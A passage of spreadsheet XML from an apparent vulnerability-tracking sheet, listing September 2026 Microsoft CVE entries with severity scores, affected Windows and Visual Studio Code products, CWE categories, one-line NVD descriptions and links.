          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T576" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69921</t>
        </is>
      </c>
    </row>
    <row r="577">
      <c r="A577" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B577" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C577" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70289</t>
        </is>
      </c>
      <c r="D577" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E577" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F577" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G577" s="5" t="inlineStr"/>
      <c r="H577" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I577" s="5" t="inlineStr"/>
      <c r="J577" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K57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77" s="5" t="inlineStr"/>
      <c r="M577" s="5" t="inlineStr"/>
      <c r="N577" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O577" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P577" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q577" s="5" t="inlineStr"/>
      <c r="R577" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S577" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Win32 Kernel Subsystem allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T577" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70289</t>
        </is>
      </c>
    </row>
    <row r="578">
      <c r="A578" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B578" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C578" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70334</t>
        </is>
      </c>
      <c r="D578" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E578" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F578" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G578" s="5" t="inlineStr"/>
      <c r="H578" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I578" s="5" t="inlineStr"/>
      <c r="J578" s="5" t="inlineStr"/>
      <c r="K578" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_code</t>
        </is>
      </c>
      <c r="L578" s="5" t="inlineStr"/>
      <c r="M578" s="5" t="inlineStr"/>
      <c r="N578" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O578" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P578" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q578" s="5" t="inlineStr"/>
      <c r="R578" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="S578" s="5" t="inlineStr">
        <is>
          <t>Incomplete list of disallowed inputs in Visual Studio Code allows an unauthorized attacker to bypass a security feature locally.</t>
        </is>
      </c>
      <c r="T578" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70334</t>
        </is>
      </c>
    </row>
    <row r="579">
      <c r="A579" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B579" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C579" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70564</t>
        </is>
      </c>
      <c r="D579" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E579" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F579" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G579" s="5" t="inlineStr"/>
      <c r="H579" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I579" s="5" t="inlineStr"/>
      <c r="J579" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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79" s="5" t="inlineStr"/>
      <c r="M579" s="5" t="inlineStr"/>
      <c r="N579" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O579" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P579" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q579" s="5" t="inlineStr"/>
      <c r="R579" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S579" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T579" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70564</t>
        </is>
      </c>
    </row>
    <row r="580">
      <c r="A580" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B580" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C580" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70569</t>
        </is>
      </c>
      <c r="D580" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E580" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F580" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G580" s="5" t="inlineStr"/>
      <c r="H580" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I580" s="5" t="inlineStr"/>
      <c r="J580" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K580" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L580" s="5" t="inlineStr"/>
      <c r="M580" s="5" t="inlineStr"/>
      <c r="N580" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O580" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P580" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q580" s="5" t="inlineStr"/>
      <c r="R580" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S580" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T580" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70569</t>
        </is>
      </c>
    </row>
    <row r="581">
      <c r="A581" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B581" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C581" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70572</t>
        </is>
      </c>
      <c r="D581" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E581" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F581" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G581" s="5" t="inlineStr"/>
      <c r="H581" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I581" s="5" t="inlineStr"/>
      <c r="J581" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K58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81" s="5" t="inlineStr"/>
      <c r="M581" s="5" t="inlineStr"/>
      <c r="N581" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O581" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P581" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q581" s="5" t="inlineStr"/>
      <c r="R581" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S581" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T581" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70572</t>
        </is>
      </c>
    </row>
    <row r="582">
      <c r="A582" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B582" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C582" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70574</t>
        </is>
      </c>
      <c r="D582" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E582" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F582" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G582" s="5" t="inlineStr"/>
      <c r="H582" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I582" s="5" t="inlineStr"/>
      <c r="J582" s="5" t="inlineStr"/>
      <c r="K582" s="5" t="inlineStr"/>
      <c r="L582" s="5" t="inlineStr"/>
      <c r="M582" s="5" t="inlineStr"/>
      <c r="N582" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O582" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P582" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q582" s="5" t="inlineStr"/>
      <c r="R582" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S582" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T582" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70574</t>
        </is>
      </c>
    </row>
    <row r="583">
      <c r="A583" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B583" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C583" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70581</t>
        </is>
      </c>
      <c r="D583" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E583" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F583" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G583" s="5" t="inlineStr"/>
      <c r="H583" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I583" s="5" t="inlineStr"/>
      <c r="J583" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K58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83" s="5" t="inlineStr"/>
      <c r="M583" s="5" t="inlineStr"/>
      <c r="N583" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O583" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P583" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q583" s="5" t="inlineStr"/>
      <c r="R583" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-20</t>
        </is>
      </c>
      <c r="S583" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T583" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70581</t>
        </is>
      </c>
    </row>
    <row r="584">
      <c r="A584" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B584" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C584" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70583</t>
        </is>
      </c>
      <c r="D584" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E584" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F584" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G584" s="5" t="inlineStr"/>
      <c r="H584" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I584" s="5" t="inlineStr"/>
      <c r="J584" s="5" t="inlineStr"/>
      <c r="K584" s="5" t="inlineStr"/>
      <c r="L584" s="5" t="inlineStr"/>
      <c r="M584" s="5" t="inlineStr"/>
      <c r="N584" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O584" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P584" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q584" s="5" t="inlineStr"/>
      <c r="R584" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S584" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Core Messaging allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T584" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70583</t>
        </is>
      </c>
    </row>
    <row r="585">
      <c r="A585" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B585" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C585" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70584</t>
        </is>
      </c>
      <c r="D585" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E585" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F585" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G585" s="5" t="inlineStr"/>
      <c r="H585" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I585" s="5" t="inlineStr"/>
      <c r="J585" s="5" t="inlineStr"/>
      <c r="K585" s="5" t="inlineStr"/>
      <c r="L585" s="5" t="inlineStr"/>
      <c r="M585" s="5" t="inlineStr"/>
      <c r="N585" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O585" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P585" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q585" s="5" t="inlineStr"/>
      <c r="R585" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="S585" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows Core Messaging allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T585" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70584</t>
        </is>
      </c>
    </row>
    <row r="586">
      <c r="A586" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B586" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C586" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71334</t>
        </is>
      </c>
      <c r="D586" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E586" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F586" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G586" s="5" t="inlineStr"/>
      <c r="H586" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I586" s="5" t="inlineStr"/>
      <c r="J586" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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86" s="5" t="inlineStr"/>
      <c r="M586" s="5" t="inlineStr"/>
      <c r="N586" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O586" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P586" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q586" s="5" t="inlineStr"/>
      <c r="R586" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S586" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows NFS Portmapper allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T586" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71334</t>
        </is>
      </c>
    </row>
    <row r="587">
      <c r="A587" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B587" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C587" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71337</t>
        </is>
      </c>
      <c r="D587" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E587" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F587" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G587" s="5" t="inlineStr"/>
      <c r="H587" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I587" s="5" t="inlineStr"/>
      <c r="J587" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K587" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L587" s="5" t="inlineStr"/>
      <c r="M587" s="5" t="inlineStr"/>
      <c r="N587" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O587" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P587" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q587" s="5" t="inlineStr"/>
      <c r="R587" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-130</t>
        </is>
      </c>
      <c r="S587" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Storage Management Provider allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T587" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71337</t>
        </is>
      </c>
    </row>
    <row r="588">
      <c r="A588" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B588" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C588" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71343</t>
        </is>
      </c>
      <c r="D588" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E588" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F588" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G588" s="5" t="inlineStr"/>
      <c r="H588" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I588" s="5" t="inlineStr"/>
      <c r="J588" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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88" s="5" t="inlineStr"/>
      <c r="M588" s="5" t="inlineStr"/>
      <c r="N588" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O588" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P588" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q588" s="5" t="inlineStr"/>
      <c r="R588" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S588" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Access Connection Manager allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T588" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71343</t>
        </is>
      </c>
    </row>
    <row r="589">
      <c r="A589" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B589" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C589" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71345</t>
        </is>
      </c>
      <c r="D589" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E589" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F589" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G589" s="5" t="inlineStr"/>
      <c r="H589" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I589" s="5" t="inlineStr"/>
      <c r="J589" s="5" t="inlineStr"/>
      <c r="K589" s="5" t="inlineStr"/>
      <c r="L589" s="5" t="inlineStr"/>
      <c r="M589" s="5" t="inlineStr"/>
      <c r="N589" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O589" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P589" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q589" s="5" t="inlineStr"/>
      <c r="R589" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S589" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T589" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71345</t>
        </is>
      </c>
    </row>
    <row r="590">
      <c r="A590" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B590" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C590" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72929</t>
        </is>
      </c>
      <c r="D590" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E590" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F590" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G590" s="5" t="inlineStr"/>
      <c r="H590" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I590" s="5" t="inlineStr"/>
      <c r="J590" s="5" t="inlineStr"/>
      <c r="K590" s="5" t="inlineStr"/>
      <c r="L590" s="5" t="inlineStr"/>
      <c r="M590" s="5" t="inlineStr"/>
      <c r="N590" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O590" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P590" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q590" s="5" t="inlineStr"/>
      <c r="R590" s="5" t="inlineStr">
        <is>
          <t>CWE-354</t>
        </is>
      </c>
      <c r="S590" s="5" t="inlineStr">
        <is>
          <t>Improper validation of integrity check value in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T590" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72929</t>
        </is>
      </c>
    </row>
    <row r="591">
      <c r="A591" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B591" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C591" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72941</t>
        </is>
      </c>
      <c r="D591" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E591" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F591" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G591" s="5" t="inlineStr"/>
      <c r="H591" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I591" s="5" t="inlineStr"/>
      <c r="J591" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K59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91" s="5" t="inlineStr"/>
      <c r="M591" s="5" t="inlineStr"/>
      <c r="N591" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O591" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P591" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q591" s="5" t="inlineStr"/>
      <c r="R591" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S591" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T591" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72941</t>
        </is>
      </c>
    </row>
    <row r="592">
      <c r="A592" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B592" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C592" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72944</t>
        </is>
      </c>
      <c r="D592" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E592" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F592" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G592" s="5" t="inlineStr"/>
      <c r="H592" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I592" s="5" t="inlineStr"/>
      <c r="J592" s="5" t="inlineStr"/>
      <c r="K592" s="5" t="inlineStr"/>
      <c r="L592" s="5" t="inlineStr"/>
      <c r="M592" s="5" t="inlineStr"/>
      <c r="N592" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O592" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P592" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q592" s="5" t="inlineStr"/>
      <c r="R592" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S592" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T592" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72944</t>
        </is>
      </c>
    </row>
    <row r="593">
      <c r="A593" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B593" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C593" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72946</t>
        </is>
      </c>
      <c r="D593" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E593" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F593" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G593" s="5" t="inlineStr"/>
      <c r="H593" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I593" s="5" t="inlineStr"/>
      <c r="J593" s="5" t="inlineStr"/>
      <c r="K593" s="5" t="inlineStr"/>
      <c r="L593" s="5" t="inlineStr"/>
      <c r="M593" s="5" t="inlineStr"/>
      <c r="N593" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O593" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P593" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q593" s="5" t="inlineStr"/>
      <c r="R593" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S593" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Storage Port Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T593" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72946</t>
        </is>
      </c>
    </row>
    <row r="594">
      <c r="A594" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B594" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
